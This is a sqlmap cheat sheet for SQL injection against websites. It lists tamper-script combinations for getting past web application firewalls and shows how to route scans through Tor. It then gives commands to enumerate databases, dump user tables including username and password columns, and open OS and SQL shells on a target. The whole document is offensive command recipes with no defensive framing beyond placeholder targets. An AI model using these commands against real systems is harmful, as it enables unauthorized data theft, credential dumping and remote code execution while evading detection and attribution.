SqlMap

WAF Bypass

1) MSSQL

--tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

2) MySQL

--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

3) General tamper option

--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

WAF bypass example string

sudo sqlmap -m SQLtargets.txt --dbs --batch --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

WAF bypass using Tor

sqlmap -r request.txt --time-sec=10 --tor --tor-type=SOCKS5 --check-tor

Scanning multiple targets

sudo sqlmap -m SQLtargets.txt --dbs --batch

Easy scanning option

sqlmap -u "http://testsite.com/login.php"

Scanning by using Tor

sqlmap -u "http://testsite.com/login.php" --tor --tor-type=SOCKS5

Scanning by manually setting the return time

sqlmap -u "http://testsite.com/login.php" --time-sec 15

List all databases at the site

sqlmap -u "http://testsite.com/login.php" --dbs

List all tables in a specific database

sqlmap -u "http://testsite.com/login.php" -D site_db --tables

Dump the contents of a DB table

sqlmap -u "http://testsite.com/login.php" -D site_db -T users --dump

List all columns in a table

sqlmap -u "http://testsite.com/login.php" -D site_db -T users --columns

Dump only selected columns

sqlmap -u "http://testsite.com/login.php" -D site_db -T users -C username,password --dump

Dump a table from a database when you have admin credentials

sqlmap -u "http://testsite.com/login.php" --method "POST" --data "username=admin&password=admin&submit=Submit" -D social_mccodes -T users --dump

Get OS shell

sqlmap --dbms=mysql -u "http://testsite.com/login.php" --os-shell

Get SQL shell

sqlmap --dbms=mysql -u "http://testsite.com/login.php" --sql-shell

Injecting sitemap.xml pages

//Adjust according to the underlying DBMS and target

sqlmap -u "target/sitemap.xml?offset=1" -p offset --level 5 --risk 3 --dbms=MySQL --hostname --test-filter="MySQL >= 5.0.12 stacked queries"
